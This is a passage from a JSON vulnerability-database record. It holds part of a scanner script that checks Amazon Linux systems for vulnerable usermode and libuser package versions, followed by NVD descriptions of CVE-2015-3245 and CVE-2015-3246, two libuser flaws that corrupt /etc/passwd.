exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"usermode\", rpm:\"usermode~1.102~3.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"usermode-debuginfo\", rpm:\"usermode-debuginfo~1.102~3.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"libuser-python\", rpm:\"libuser-python~0.56.13~8.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"libuser\", rpm:\"libuser~0.56.13~8.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"libuser-debuginfo\", rpm:\"libuser-debuginfo~0.56.13~8.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"libuser-devel\", rpm:\"libuser-devel~0.56.13~8.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:14:41", "bulletinFamily": "NVD", "description": "libuser before 0.56.13-8 and 0.60 before 0.60-7, as used in the userhelper program in the usermode package, directly modifies /etc/passwd, which allows local users to cause a denial of service (inconsistent file state) by causing an error during the modification. NOTE: this issue can be combined with CVE-2015-3245 to gain privileges.", "modified": "2018-05-20T01:29:00", "id": "CVE-2015-3246", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3246", "published": "2015-08-11T14:59:00", "title": "CVE-2015-3246", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:14:41", "bulletinFamily": "NVD", "description": "Incomplete blacklist vulnerability in the chfn function in libuser before 0.56.13-8 and 0.60 before 0.60-7, as used in the userhelper program in the usermode package, allows local users to cause a denial of service (/etc/passwd corruption) via a newline character in the GECOS field.", "modified": "2018-05-20T01:29:00", "id": "CVE-2015-3245", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3245", "published": "2015-08-11T14:59:00", "title": "CVE-2015-3245", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}]}
